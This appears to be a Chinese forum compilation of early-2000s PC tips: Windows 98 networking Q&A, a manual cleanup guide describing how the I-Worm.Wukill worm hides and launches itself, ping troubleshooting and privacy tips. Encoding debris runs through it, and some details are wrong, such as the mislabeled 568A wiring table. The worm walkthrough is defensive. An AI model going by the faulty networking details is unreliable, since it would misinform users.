答:這兩種服務(wù)現(xiàn)在用的皆比較廣泛,可以只用一臺(tái)計(jì)算機(jī)或用兩臺(tái)都可以,,當(dāng)然具體根據(jù)貴單位的預(yù)算開支和流量來(lái)決定,。假如流量不大的話,,建議只使用一臺(tái)機(jī)器即可。至于軟件方面,,可以使用Windows 2000作服務(wù)器平臺(tái),,然后使用Imail或Easymail作為郵件服務(wù)軟件,www服務(wù)建議使用apache serve軟件,,因?yàn)閃indows 2000自帶的IIS存在許多漏洞,,而且不安裝,在建立www服務(wù)器后,,需考慮支持的語(yǔ)言腳本,,現(xiàn)在用的比較廣的是ASP和PHP,當(dāng)然,具體使用哪種語(yǔ)言,,很簡(jiǎn)單,,看你自己精通哪方面就使用哪方面的,還有一點(diǎn)你沒(méi)提供到的,,就是很有必要建立一個(gè)ftp服務(wù),,你可使用u-ftp軟件,,這款軟件在安裝和使用方面都不難,。 14、問(wèn):家里原先有一臺(tái)PII的計(jì)算機(jī),,最近又新增一臺(tái)P4機(jī)器,,操作系統(tǒng)都為Windows 98且已安裝網(wǎng)卡,現(xiàn)在我想把他們聯(lián)起來(lái)共享資源,,該怎么辦,? 答:你所提的實(shí)際上即現(xiàn)在應(yīng)用的比較廣泛的對(duì)等網(wǎng)的連接。很簡(jiǎn)單,,因你已有網(wǎng)卡,,你需做的使是購(gòu)買適合長(zhǎng)度的超五類線和2個(gè)RJ45的水晶頭,,再去借一把打線鉗,。然后再根據(jù)標(biāo)準(zhǔn)做一對(duì)跳線,即一頭采用T568A標(biāo)準(zhǔn)(具體線的排列是:白綠,、綠,、白橙,、藍(lán)、白藍(lán),、橙,、白棕、棕),,另一頭采用T568B標(biāo)準(zhǔn)(白橙,、橙,、白綠、藍(lán),、白藍(lán),、綠、白棕,、棕),。然后在操作系統(tǒng)中添加TCP/IP協(xié)議和Netbuei協(xié)議,把工作組設(shè)置為workgroup,,計(jì)算機(jī)不能相同,。 15、問(wèn):辦公室機(jī)器桌面的“網(wǎng)上鄰居”圖標(biāo)沒(méi)了,,能上Internet,,但無(wú)法瀏覽其他機(jī)器上的資源了,怎么辦,? 答:說(shuō)明你的Internet屬性完好,,但網(wǎng)上鄰居屬性中的“Microsoft 網(wǎng)絡(luò)用戶”這一客戶組件沒(méi)了。 進(jìn)到“控制面板”中雙擊“網(wǎng)絡(luò)”,,先在彈出的網(wǎng)絡(luò)對(duì)話框中點(diǎn)按“添加”按鈕,,再?gòu)碾S后彈出的“請(qǐng)選擇網(wǎng)絡(luò)組件類型”對(duì)話框中雙擊“客戶”,最后從隨后的“選擇網(wǎng)絡(luò)客戶機(jī)”對(duì)話框的左側(cè)選擇“Microsoft”后再選擇“Microsoft 網(wǎng)絡(luò)用戶”,,“確定”再“確定”并據(jù)提示重啟計(jì)算機(jī)就ok啦,!先回去解決這個(gè)問(wèn)題吧你…… 16、問(wèn):辦公室機(jī)器桌面的網(wǎng)上鄰居圖標(biāo)解決了且也能瀏覽其他機(jī)器的共享資源了,,但發(fā)現(xiàn)右鍵中的“共享”命令沒(méi)了,!怎么辦? 答:這是因?yàn)檫€缺少個(gè)“Microsoft網(wǎng)絡(luò)上的文件與打印機(jī)共享”這一網(wǎng)絡(luò)服務(wù)協(xié)議呢! 先右擊桌面“網(wǎng)上鄰居”選“屬性”,,對(duì)話框中點(diǎn)按“添加”按鈕,,再?gòu)碾S后彈出的“請(qǐng)選擇要安裝的網(wǎng)絡(luò)組件”對(duì)話框中雙擊“服務(wù)”,最后從隨后的“選擇網(wǎng)絡(luò)服務(wù)”對(duì)話框中選擇“Microsoft網(wǎng)絡(luò)上的文件與打印機(jī)共享”,,“確定”再“確定”并據(jù)提示重啟計(jì)算機(jī)就ok啦,! 17、問(wèn):右鍵中的“共享”命令已經(jīng)顯身,!但我設(shè)了共享不想讓別人從網(wǎng)上鄰居中看到這個(gè)共享目錄,,只有自己知道且能實(shí)現(xiàn)異地機(jī)上有完全操作的權(quán)限。 答:找到你想要共享的文件夾并右鍵點(diǎn)選“共享…”----這里我就以共享“D:\Windows 98”為例,,先選中“共享為”后在共享名“Windows 98(當(dāng)然也可改名共享哦)”后加一英文狀態(tài)的“$”符,,再選中“完全”并輸入設(shè)定好“密碼”,然后“確定”一次密碼就OK了,。 這樣一來(lái),,絕對(duì)保證別人從網(wǎng)上鄰居中看不到這個(gè)共享目錄的,!那~~自己想從異地機(jī)上進(jìn)入并實(shí)現(xiàn)完全操作時(shí)怎么辦呢?呵呵,,這么辦:從異地機(jī)的地址欄中鍵入“\\(機(jī)器名)\$(你的共享目錄名)”并“ENTER”,,再輸入密碼并確定后,就進(jìn)入啦,!這樣你可靜悄悄地實(shí)現(xiàn)異地機(jī)上在自己設(shè)定的共享目錄內(nèi)進(jìn)行完全操作啦,!不過(guò)注意其中“\”不能誤輸入成“/”哦!……好了,,你會(huì)了嗎,? 18、問(wèn):一塊PCI總線的10/100自適應(yīng)網(wǎng)卡,,無(wú)法正常工作,。主要表現(xiàn)在網(wǎng)絡(luò)時(shí)斷時(shí)續(xù),不管是不是Ping自己的IP地址,,還是Ping對(duì)方的IP地址,,都有這種情況發(fā)生。查看網(wǎng)卡的指示燈也出現(xiàn)同樣的現(xiàn)象,。 答:首先你可檢查Hub的連接口是不是出了故障,,將該網(wǎng)卡接到其他端口上,如果問(wèn)題依然如故,,說(shuō)明Hub沒(méi)有問(wèn)題,。然后你可用網(wǎng)卡隨盤附帶的測(cè)試程序盤查看網(wǎng)卡的有關(guān)參數(shù),其IRQ值為5,,再回到Windows 95/98操作系統(tǒng),查看操作系統(tǒng)分配給網(wǎng)卡的參數(shù)值,,其IRQ同樣應(yīng)是5,。此外,可檢查安裝該網(wǎng)卡的主板插槽是否有故障,,你可打開機(jī)箱,,將網(wǎng)卡換個(gè)PCI插槽試試。此外,,你還可檢查CMOS參數(shù)設(shè)置,,重新啟動(dòng)計(jì)算機(jī),進(jìn)入CMOS狀態(tài),,選擇“PNP/PCI Configuration”一項(xiàng),,如果IRQ5后面的狀態(tài)為“Legacy ISA”(保留的ISA總線設(shè)備),就應(yīng)當(dāng)將IRQ5后面的狀態(tài)改為“PCI/ISA PNP”,。 19,、問(wèn):我的電腦與一個(gè)對(duì)等網(wǎng)連接好了,,但不能讀別人電腦上的數(shù)據(jù),這是怎么回事,? 答:可能是你沒(méi)有設(shè)置好資源共享:選擇“網(wǎng)絡(luò)→配置→文件及打印共享”,,將兩個(gè)選項(xiàng)全部打勾并確定,安裝成功的標(biāo)志是配置中出現(xiàn)了“Microsoft網(wǎng)絡(luò)上的文件與打印機(jī)共享”選項(xiàng),,注意,,還要檢查它與NetBEUI協(xié)議是否進(jìn)行了綁定。選擇“配置”中的NetBEUI協(xié)議,,點(diǎn)擊“屬性”按鈕,,看綁定中“Microsoft網(wǎng)絡(luò)上的文件與打印機(jī)共享”、“Microsoft網(wǎng)絡(luò)用戶”前是否已經(jīng)有對(duì)勾了,。還要在“網(wǎng)絡(luò)→標(biāo)識(shí)”里將“計(jì)算機(jī)名”設(shè)置好,,確定之后系統(tǒng)將重新啟動(dòng)。 20,、問(wèn):我的網(wǎng)絡(luò)從集線器升級(jí)為交換機(jī)后,,感覺(jué)速度并沒(méi)有多大提高,是什么原因,? 答:這種情況需要從以下幾個(gè)方面來(lái)分析: 1,、首先應(yīng)確認(rèn)網(wǎng)絡(luò)是否工作在100M狀態(tài),具體做法是:確認(rèn)網(wǎng)線是五類以上線,,網(wǎng)線做法遵循100M標(biāo)準(zhǔn),,網(wǎng)卡支持100M工作狀態(tài),只有滿足以上條件,,交換機(jī)才能工作于100M狀態(tài),,從而最大限度地體現(xiàn)交換機(jī)的性能優(yōu)勢(shì)。 2,、如果網(wǎng)絡(luò)在升級(jí)前工作正常,,數(shù)據(jù)交換量不是很大,數(shù)據(jù)沖突和廣播風(fēng)暴現(xiàn)象出現(xiàn)的不是很頻繁,,那么升級(jí)后網(wǎng)絡(luò)性能的提升可能不是很明顯,,這是正常現(xiàn)象,。 3,、還有一種情況是因?yàn)榫W(wǎng)絡(luò)結(jié)構(gòu)設(shè)置不當(dāng)引起的,,例如,如果把集線器放在第一級(jí)連接服務(wù)器,而把交換機(jī)放在下一級(jí)來(lái)連接工作站,,這樣數(shù)據(jù)交換仍然通過(guò)集線器進(jìn)行,,交換機(jī)的性能優(yōu)勢(shì)沒(méi)有體現(xiàn)出來(lái),。所以,,在組網(wǎng)時(shí)應(yīng)當(dāng)充分考慮網(wǎng)絡(luò)結(jié)構(gòu)的合理性,,應(yīng)將性能較好的設(shè)備置于整個(gè)網(wǎng)絡(luò)的最高級(jí)。 21、問(wèn):VLAN是什么意思,,使用它有什么好處,? 答:VLAN是Virtual Local Area Network的縮寫,,即虛擬局域網(wǎng)的意思。VLAN的劃分有三種方式:基于端口(Port),、基于MAC地址和基于IP地址,。通過(guò)劃分VLAN,可以把數(shù)據(jù)交換限制在各個(gè)虛擬網(wǎng)的范圍內(nèi),從而減少整個(gè)網(wǎng)絡(luò)范圍內(nèi)廣播包的傳輸,提高了網(wǎng)絡(luò)的傳輸效率;同時(shí)各虛擬網(wǎng)之間不能直接進(jìn)行通訊,,而必須通過(guò)路由器轉(zhuǎn)發(fā),起到了隔離端口的作用,為高級(jí)安全控制提供了可能,增強(qiáng)了網(wǎng)絡(luò)的安全性,。VLAN功能的適用性很廣,,在數(shù)據(jù)交換較頻繁或?qū)W(wǎng)絡(luò)安全性有要求的環(huán)境均可適用,,如:1,、在智能小區(qū),、校園,、企業(yè)等應(yīng)用環(huán)境,,使用VLAN功能可使不同VLAN間的機(jī)器不能互相訪問(wèn),可為網(wǎng)絡(luò)安全控制提供良好保障,;2,、在游戲廳、大中型企業(yè)等環(huán)境,,使用VLAN可大大減少網(wǎng)絡(luò)中不必要的數(shù)據(jù)交換的數(shù)量,,杜絕廣播風(fēng)暴,提升網(wǎng)絡(luò)傳輸性能,。 22,、問(wèn):我的自適應(yīng)網(wǎng)卡只有紅燈閃爍,綠燈不亮,,這種情況正常嗎,? 答:首先你應(yīng)該了解一般自適應(yīng)網(wǎng)卡紅燈和綠燈分別代表什么含義——紅燈代表Link/Act(連通/工作),即連通時(shí)紅燈長(zhǎng)亮,,傳輸數(shù)據(jù)時(shí)閃爍,;綠燈代表FDX(全雙工),即全雙工狀態(tài)時(shí)亮,,半雙工狀態(tài)時(shí)滅,。如果一個(gè)半雙工的網(wǎng)絡(luò)設(shè)備(如Hub)和自適應(yīng)網(wǎng)卡相連,,由于這張網(wǎng)卡是自適應(yīng)網(wǎng)卡,它也會(huì)工作在半雙工狀態(tài),,所以綠燈不亮也屬于正常情況,。 23、問(wèn):如何使用交換機(jī)的UpLink端口,,怎樣連接?使用了UpLink口后,,是否還可以使用其相鄰最近的端口,? 答:UpLink口是交換機(jī)上常見的一種端口,它是為了便于兩臺(tái)交換機(jī)之間進(jìn)行級(jí)聯(lián)的端口,。它與其相鄰的普通UTP口使用的是同一通道,,因而,如果使用了UpLink口,,另一個(gè)與之相鄰的普通端口就不能再使用了,。這兩個(gè)端口稱為共享端口,不能同時(shí)使用,。級(jí)聯(lián)的時(shí)候,,你可使用一般的網(wǎng)線(網(wǎng)線的兩端都遵循同一標(biāo)準(zhǔn),即同是EIA/TIA 568A或568B)將一個(gè)交換機(jī)的普通端口和另一個(gè)交換機(jī)的UpLink口連起來(lái),。如兩個(gè)設(shè)備都使用UpLink口連接,,網(wǎng)線需要一端使用EIA/TIA 568A的標(biāo)準(zhǔn),另一端使用EIA/TIA 568B的標(biāo)準(zhǔn)(如下表),。 標(biāo)準(zhǔn)568a 標(biāo)準(zhǔn)568b 橙白1 綠白1 橙2 綠2 綠白 3 橙白3 藍(lán)4 藍(lán)4 藍(lán)白5 藍(lán)白5 綠6 橙6 棕白7 棕白7 棕8 棕8 24,、問(wèn):我在安裝網(wǎng)卡后,在“系統(tǒng)→設(shè)備管理器”中網(wǎng)卡出現(xiàn)黃色的“,!”號(hào),,請(qǐng)問(wèn)該如何解決? 答:網(wǎng)卡較容易與其他設(shè)備發(fā)生資源沖突,,尤其是在系統(tǒng)中安裝有多個(gè)插卡的情況下,,解決辦法是: 1、更換網(wǎng)卡在主板插槽上的位置是最好的解決辦法,。 2,、在該網(wǎng)卡“屬性”窗口“資源”標(biāo)簽中找到“資源類型”列表,選定發(fā)生沖突的“資源”,,按“更改設(shè)置”按鈕,,更改發(fā)生沖突的IRQ中斷號(hào)或者I/O地址。 3,、有些PCI網(wǎng)卡會(huì)強(qiáng)行占用IRQ10,,與一些強(qiáng)行占用IRQ10的顯示卡發(fā)生IRQ中斷沖突,,如果遇到這種情況,可在BIOS中將“Assign IRQ For VGA”項(xiàng)設(shè)置為Disabled,,不給顯示卡分配固定的中斷,。 4、運(yùn)行網(wǎng)卡附帶的軟盤中的設(shè)置程序,,將網(wǎng)卡設(shè)置為非PNP模式,,設(shè)置IRQ中斷號(hào)和I/O地址為系統(tǒng)未占用的地址;并在BIOS中將相應(yīng)中斷號(hào)由PCI/ISA改為L(zhǎng)egacy ISA,。 如果使用上述方法均不能解決故障,,建議換一塊網(wǎng)卡試試。 25.問(wèn):ADSL上網(wǎng)網(wǎng)頁(yè)打不開的問(wèn)題,? 答:是MTU的問(wèn)題,!改一下注冊(cè)表! HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\NetTrans\0000\主鍵下面建立字符串鍵名為MaxMTU,,鍵值為1450 查殺I-Worm.Wukill病毒(注意有變種了)的手工方法 (微笑) 我是用手工殺的,。金山毒霸好象還不行,跟本就不報(bào)警,。 首先用進(jìn)程管理工具(如“優(yōu)化大師”帶的進(jìn)程管理工具)把可疑的進(jìn)程殺掉,,再搜索最大不超過(guò)87KB的“*.EXE”文件,瑞星上說(shuō)的自啟動(dòng)“MSTRAY.EXE”文件不對(duì),,它好象有了新的變種,,自啟動(dòng)的文件名可以變換,而且有時(shí)每次重啟動(dòng)都會(huì)變,,也不一定在WINDOWS哪個(gè)目錄下,,所以要查整個(gè)不超過(guò)87KB大小的.EXE文件,然后將所有圖標(biāo)為文件夾樣式的.EXE文件刪掉,。同時(shí)對(duì)照注冊(cè)表里的RUN項(xiàng),,查找不正常的啟動(dòng)項(xiàng)(建議也用優(yōu)化大師,這樣好判別,,毒霸的也可以),,除刪掉啟動(dòng)項(xiàng)外,還要再查找一次不正常啟動(dòng)項(xiàng)對(duì)應(yīng)的程序,,并刪掉,。注意:這步操作十分危險(xiǎn),建議由有經(jīng)驗(yàn)的人員操作,。 接著再分別查找comment.htt 和desktop.ini,,把它們都刪掉。注意不要把“*:\My Documents”下的這兩個(gè)文件刪了,,一般這里的都是正常文件(我自己用的笨辦法就是用記事本打開,,看看里面是不是MICROSOFT的東東),。 最后重啟就OK了。 瑞星的在2月份就可以殺了,,毒霸好象到現(xiàn)在都不行,,是它的破壞力太小所以毒霸不屑一顧?,?,??,??。。,。。,。,。?! 剛又看了看前人的貼,,發(fā)現(xiàn)這個(gè)家伙變種變的還是蠻快的。其中最大的變化就是自啟動(dòng)項(xiàng)的變化,,這個(gè)病毒我遇到的最厲害的是在內(nèi)存中同時(shí)有不同文件名的3個(gè)進(jìn)程,,并且自啟動(dòng)項(xiàng)的名稱也不斷變化,但WINFILE.EXE這個(gè)文件始終存在,,而且一般是在根目錄下,,并陪隨comment.htt 和desktop.ini這兩個(gè)文件,可能這可以算為標(biāo)志性文件之一了,。在其它的目錄下,,則會(huì)根據(jù)你實(shí)際存在的目錄名而更換自己的名稱(呵,呵,,這一點(diǎn)我比較佩服),,不過(guò)無(wú)論它怎么換名,文件大小大都是約在85KB左右(具體字節(jié)我沒(méi)有記錄),。 建議懷疑自己中毒時(shí),,把“隱藏已知文件類型的擴(kuò)展名”這個(gè)選項(xiàng)去掉,如果有文件夾圖標(biāo)的.EXE文件,,那么恭喜你---------------中毒了?。。,。,?! 另:正常的WINFILE.EXE文件大小為151419字節(jié),且圖標(biāo)為一個(gè)文件柜樣式,。 在網(wǎng)上看到了一篇貼子,。I-Worm.Wukill 破壞方法:這個(gè)病毒采用文件夾圖標(biāo),具有很大迷惑性,。該病毒運(yùn)行后,,會(huì)將自己大量復(fù)制到其他目錄中。 一,、 病毒首次運(yùn)行時(shí)將顯示"This File Has Been Damage!",; 二、 將自己復(fù)制到windows目錄下并改名為Mstray.exe,; 三,、 修改注冊(cè)表: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run 以達(dá)到其自啟動(dòng)的目的; 四,、 枚舉磁盤目錄,,在每個(gè)根目錄下釋放下列文件: winfile.exe 病毒主體程序 coment.htt 利用IE漏洞調(diào)用同一個(gè)目錄下的"winfile.exe",屬性為隱藏,。 desktop.ini 系統(tǒng)為隱藏,。采用web方式瀏覽文件夾時(shí),系統(tǒng)會(huì)調(diào)用該文件,,該文件調(diào)用coment.htt ,,從而激活病毒。 五,、 病毒修改注冊(cè)表,,隱藏系統(tǒng)文件、隱藏受系統(tǒng)保護(hù)的文件,、隱藏已知的擴(kuò)展名稱,。 這樣,用戶看不到coment.htt和desktop.ini,, winfile.exe被隱藏后綴明,,又是文件夾圖標(biāo),用戶極容易認(rèn)為是文件夾而點(diǎn)擊,。 同時(shí)病毒在當(dāng)前路徑下生成的自身拷貝,,名稱采用上級(jí)目錄,或者是當(dāng)前窗口的標(biāo)題,,增加隱蔽性,。 六、病毒調(diào)用Outlook發(fā)送攜帶病毒的信件,。 你先試試: 1 [在運(yùn)行里輸入REGEDIT (進(jìn)入注冊(cè)表編輯器) 在編輯工具里點(diǎn)吉查找 輸winfile 確定,,即輸出winfile.ini 刪除它 然后回盤里就可以刪除了 ,!] 2 用KV2004升級(jí)版在網(wǎng)上進(jìn)行了最新的升級(jí)后,運(yùn)行KV2004就可以了 利用Ping命令判定網(wǎng)絡(luò)故障 (sindasun) Ping 是Windows系列自帶的一個(gè)可執(zhí)行命令,。利用它可以檢查網(wǎng)絡(luò)是否能夠連通,,用好它可以很好地幫助我們分析判定網(wǎng)絡(luò)故障。應(yīng)用格式:Ping IP地址,。該命令還可以加許多參數(shù)使用,,具體是鍵入Ping按回車即可看到詳細(xì)說(shuō)明。 #11.Ping本機(jī)IP ?。牐犂绫緳C(jī)IP地址為:172.168.200.2,。則執(zhí)行命令Ping 172.168.200.2。如果網(wǎng)卡安裝配置沒(méi)有問(wèn)題,,則應(yīng)有類似下列顯示: ?。牐燫eplay from 172.168.200.2bytes=32 time<10ms Ping statistics for 172.168.200.2 ?。牐燩acketsSent=4 Received=4Lost=00% loss ?。牐燗pproximate round trip times in milli-seconds Minimum=0msMaxiumu=1msAverage=0ms ?。牐犎绻贛S-DOS方式下執(zhí)行此命令顯示內(nèi)容為:Request timed out,則表明網(wǎng)卡安裝或配置有問(wèn)題,。將網(wǎng)線斷開再次執(zhí)行此命令,,如果顯示正常,則說(shuō)明本機(jī)使用的IP地址可能與另一臺(tái)正在使用的機(jī)器IP地址重復(fù)了,。如果仍然不正常,,則表明本機(jī)網(wǎng)卡安裝或配置有問(wèn)題,需繼續(xù)檢查相關(guān)網(wǎng)絡(luò)配置,。 #12.Ping網(wǎng)關(guān)IP ?。牐牸俣ňW(wǎng)關(guān)IP為:172.168.6.1,則執(zhí)行命令Ping 172.168.6.1,。在MS-DOS方式下執(zhí)行此命令,,如果顯示類似以下信息: Reply from 172.168.6.1 bytes=32 time=9ms TTL=255 ?。牐燩ing statistics for 172.168.6.1 ?。牐燩acketsSent=4Received=4Lost=00% loss Approximate round trip times in milli-seconds ?。牐燤inimum=1msMaximum=9msAverage=5ms ?。牐爠t表明局域網(wǎng)中的網(wǎng)關(guān)路由器正在正常運(yùn)行。反之,,則說(shuō)明網(wǎng)關(guān)有問(wèn)題,。 #13.Ping遠(yuǎn)程IP ?。牐犨@一命令可以檢測(cè)本機(jī)能否正常訪問(wèn)Internet。比如本地電信運(yùn)營(yíng)商的IP地址為:202.102.48.141,。在MS-DOS方式下執(zhí)行命令:Ping 202.102.48.141,,如果屏幕顯示: Reply from 202.102.48.141 bytes=32 time=33ms TTL=252 ?。牐燫eply from 202.102.48.141 bytes=32 time=21ms TTL=252 ?。牐燫eply from 202.102.48.141 bytes=32 time=5ms TTL=252 Reply from 202.102.48.141 bytes=32 time=6ms TTL=252 ?。牐燩ing statistics for 202.102.48.141 ?。牐燩acketsSent=4Received=4Lost=00% loss Approximate round trip times in milli-seconds ?。牐燤inimum=5msMaximum=33msAverage=16ms ?。牐爠t表明運(yùn)行正常,能夠正常接入互聯(lián)網(wǎng),。反之,,則表明主機(jī)文件(windows/host)存在問(wèn)題。 東西搶注:注意一下:沖擊波之后的DNS服務(wù)器都是禁止PING的也就是關(guān)閉了ICMP協(xié)議的 這樣大家可以使用TRACERT這個(gè)命令跟蹤數(shù)據(jù)包,,也是可以同樣達(dá)到目的 當(dāng)心電腦暴露你的隱私 (sindasun) 如果使用的是辦公室,、網(wǎng)吧等地的公共用機(jī),你的很多秘密就可能暴露在別人眼前,。 #1一,、操作系統(tǒng) 如果想把屬于隱私的圖片、視頻片斷或者重要文檔文件等保存在公共電腦中,,很多人采取的辦法把文件或文件夾的屬性改為“隱藏”,,然后再把它們藏匿在電腦中某個(gè)不起眼的文件夾里??稍赪in 98的“開始”→“文檔”菜單中,,會(huì)記錄最近打開過(guò)的15個(gè)文件名,因此別人可以點(diǎn)擊相應(yīng)的文件名來(lái)打開文件,,就算你已經(jīng)把文件藏起來(lái)了,,別人也可以從這里窺視你的秘密。 解決辦法:要清除這些痕跡,,你可以用鼠標(biāo)右鍵點(diǎn)擊任務(wù)欄的“屬性”,,后點(diǎn)“開始菜單程序”,再點(diǎn)“清除”就可以刪除“文檔”菜單中的內(nèi)容和其他個(gè)人歷史記錄列表了,。這樣做可以在一定程度上保護(hù)你的秘密,,但別人還可以通過(guò)“開始”菜單中的“查找”功能來(lái)搜索你的重要文件,按文件的類別把硬盤上所有的圖形文件、*.txt,、*.doc文件等找出來(lái),,然后一個(gè)一個(gè)地查看,秘密依然存在被泄露的可能,。 報(bào)紙上曾介紹過(guò)一種修改注冊(cè)表隱藏硬盤的辦法,,即把要隱藏的文件專門放到某個(gè)硬盤(如F盤)上,然后修改注冊(cè)表把這個(gè)盤藏起來(lái)(在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer下新建一個(gè)Dword值“NoDrives”,,再設(shè)置鍵值,,例如把鍵值設(shè)為20就可以隱藏F盤),在資源管理器中就看不到這個(gè)盤了,。這種辦法表面上無(wú)懈可擊,,被隱藏的盤對(duì)于大多數(shù)軟件都不可見,你通過(guò)“查找”功能也無(wú)法找到該盤上的文件,,一些所謂的電腦高手也把這種辦法當(dāng)做可靠的保密手段,。然而這種方法有重大的漏洞,在DOS狀態(tài)下這個(gè)盤完全可見,,而在Windows下,,我找到一種非常簡(jiǎn)單的辦法破除這種限制。只要在“我的電腦”或者IE瀏覽器的地址欄中鍵入盤符“F:”,,然后打回車鍵,,這個(gè)盤的內(nèi)容就一覽無(wú)余,所有的秘密蕩然無(wú)存,。 解決辦法:如果對(duì)保密的要求比較高,,可以用一些軟件來(lái)加密或者隱藏,可以基本解決保密問(wèn)題,。但是,就算是用加密/隱藏軟件,,也不是十分安全的,。一方面有些隱藏軟件有漏洞,對(duì)于熟悉計(jì)算機(jī)的用戶來(lái)說(shuō),,并不難破解限制,;另一方面一些加密/隱藏軟件的加密程度不高,可找到相應(yīng)的軟件來(lái)破解密碼,。所以對(duì)于保密要求非常高的用戶來(lái)說(shuō),,如果是比較小的文件,最好不要保存在硬盤上,,可以保存在軟盤上,,如果文件太大,不能保存在軟盤上,可以用PGP之類的超強(qiáng)加密軟件來(lái)加密,。 #1二,、常用程序 Windows下的很多應(yīng)用程序,如Word,、Excel,、媒體播放器Media Player、RealPlayer等,,會(huì)在該程序“文件”菜單下列出最近打開過(guò)的一些文件名,。盡管你已經(jīng)把文件藏匿在電腦中的某個(gè)地方了,但別人還是可以通過(guò)這些文件名清單輕易打開相應(yīng)的文件,。 解決辦法:對(duì)于Word 2000,、Excel 2000等,可以在Word/Excel的“工具”→“選項(xiàng)”的“常規(guī)”選項(xiàng)卡中把“列出最近所用文件”的個(gè)數(shù)改為0,;在媒體播放器和Realplayer中清除這些歷史記錄,,只能到注冊(cè)表中刪除,要清除Realplayer中的歷史記錄,,則到HKEY_LOCAL_MACHINE\Software\CLASSES\Software\RealNetworks\Realplayer\6.0\Preferences\MostRecentClips1刪除相關(guān)鍵值(Realplayer默認(rèn)情況下是在“文件”菜單中顯示最近播放過(guò)的8個(gè)剪輯,,Mostrecentclip1只是第一個(gè),要?jiǎng)h除其他幾個(gè)你還須要分別刪除),。要清除媒體播放器上的記錄只有到注冊(cè)表中,,刪除HKEY_HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\RecentFileList下的鍵值。通過(guò)注冊(cè)表來(lái)清除歷史記錄比較麻煩,,而且對(duì)新手來(lái)說(shuō)具有一定危險(xiǎn)性,。 變通的解決辦法是:在看完這些視頻片斷之后,把文件的擴(kuò)展名改為Realplayer或者媒體播放器等不支持的虛假擴(kuò)展名,。例如你剛才看的視頻文件名字叫做123.mpeg,,你可以把它的文件名改為sdk.dhl,然后把它重新藏到其他不起眼的文件夾中,,最好遠(yuǎn)離原來(lái)的文件夾,。雖然原先的記錄還保存在“文件”菜單中,但是Realplayer,、媒體播放器已經(jīng)找不到該文件了,。下次你要再次觀看時(shí),可以重新把文件的擴(kuò)展名修改回來(lái),。修改文件擴(kuò)展名對(duì)于隱藏其他類型的文件也是一個(gè)簡(jiǎn)單有效的辦法,,雖然這種辦法并不很保險(xiǎn),但對(duì)于很多人而言,,這種辦法已經(jīng)能基本滿足要求了,。相比之下Yahoo!Player在這方面就做得好得多,你可以到Y(jié)ahoo,!Player的“Edit→Prefenrence→General”中勾選“On exit,,clear history(退出時(shí)清除歷史記錄)”,這樣以后你每次關(guān)閉Yahoo,!Player就會(huì)自動(dòng)清除歷史記錄,。 #1三、IE瀏覽器 如果你是上網(wǎng)用戶,,更要小心你的秘密被泄露了,。IE瀏覽器會(huì)記錄你訪問(wèn)過(guò)的站點(diǎn)的地址,別人可以通過(guò)歷史記錄來(lái)查看,。 解決辦法:如果你不想讓別人知道你的行蹤,,可以通過(guò)點(diǎn)擊瀏覽器“工具→Internet選項(xiàng)→常規(guī)”選項(xiàng)卡中“清除歷史記錄”。 對(duì)于那些通過(guò)登錄Web收發(fā)電子郵件的用戶來(lái)說(shuō),,你所看過(guò)的信別人可以輕易看到,,這是一個(gè)極其嚴(yán)重卻被廣泛忽視的安全問(wèn)題。那些在網(wǎng)吧上網(wǎng)的人士要特別小心了,,說(shuō)不定你前腳剛走,,那些別具用心的人就來(lái)偷看你的秘密了。通過(guò)點(diǎn)擊瀏覽器的“歷史”按鈕,,可以看到最近一段時(shí)間所訪問(wèn)頁(yè)的記錄,。在先選擇“脫機(jī)工作”的情況下,再點(diǎn)擊有關(guān)E-mail的頁(yè)面,,別人就可以看到你曾看過(guò)的信,! 解決辦法:要消除這個(gè)漏洞,僅靠清除歷史記錄是不夠的,,別人即使通過(guò)歷史記錄看不到你的訪問(wèn)記錄了,,但是可以到C:\Windows\Temporary Internet Files文件夾中去查看全部?jī)?nèi)容。關(guān)鍵就是把這個(gè)文件夾中的內(nèi)容清除,,你可以點(diǎn)擊瀏覽器“工具”→“Internet選項(xiàng)”之“常規(guī)”選項(xiàng)卡中的“刪除文件”來(lái)刪除所有的脫機(jī)內(nèi)容,。 你可能會(huì)發(fā)現(xiàn),當(dāng)你用鼠標(biāo)點(diǎn)擊電子郵件的用戶名登錄框時(shí),,會(huì)列出曾經(jīng)輸入過(guò)的電子郵件地址;當(dāng)你點(diǎn)擊電子郵件的主題欄時(shí),,可能會(huì)列出曾經(jīng)輸入過(guò)的郵件標(biāo)題,;當(dāng)你在論壇中的寫帖子時(shí)的標(biāo)題欄中也會(huì)列出曾經(jīng)輸入過(guò)的一些標(biāo)題。所有這些表單中的信息都有可能會(huì)泄露你不想他人知道的信息,。IE瀏覽器具有的“自動(dòng)完成”功能存儲(chǔ)了以前曾鍵入過(guò)的條目,,因此當(dāng)你下次填寫表單的時(shí)候,會(huì)自動(dòng)列出可能相符的項(xiàng)。 解決辦法:要清除記錄,,可點(diǎn)擊IE瀏覽器的“工具”→“Internet選項(xiàng)”→“內(nèi)容”選項(xiàng)卡中的“自動(dòng)完成”,,然后點(diǎn)“清除表單”來(lái)清除自動(dòng)完成歷史記錄。 #1四,、網(wǎng)絡(luò)聊天與郵件 當(dāng)你在聊天室,、論壇中胡說(shuō)八道的時(shí)候,別以為沒(méi)有人知道你來(lái)自何方,,你的IP地址早已經(jīng)被記錄在案,。當(dāng)你用QQ聊天時(shí),別人也有辦法知道你的IP地址,,只要到網(wǎng)上下載安裝一個(gè)查IP地址的小工具,,就可以看到你的IP地址,然后通過(guò)“追捕”軟件查出你是哪個(gè)地方的(誤報(bào)可能性大),,所以別奇怪有人怎么會(huì)知道你的地理方位,。 解決方案:如要想隱藏自己的IP地址,最有效的還是通過(guò)代理服務(wù)器上網(wǎng),。 如今網(wǎng)絡(luò)黑客工具(木馬程序)的泛濫,,使得很多并非真正黑客的人也可以遠(yuǎn)程控制你的計(jì)算機(jī),竊取你的信息,。當(dāng)別人用QQ或者E-mail向你發(fā)相片或者歌曲的時(shí)候,,說(shuō)不定你正在接收一個(gè)木馬程序。計(jì)算機(jī)如果中了木馬程序后,,就沒(méi)有什么秘密可言了,。 解決方案:要防范黑客程序,除了不要下載來(lái)路不明的軟件外,,安裝防火墻和反病毒程序是最有效的措施,。如果你對(duì)網(wǎng)絡(luò)安全性異常敏感,還應(yīng)注意對(duì)Windows系統(tǒng)的安全漏洞打補(bǔ)丁,。 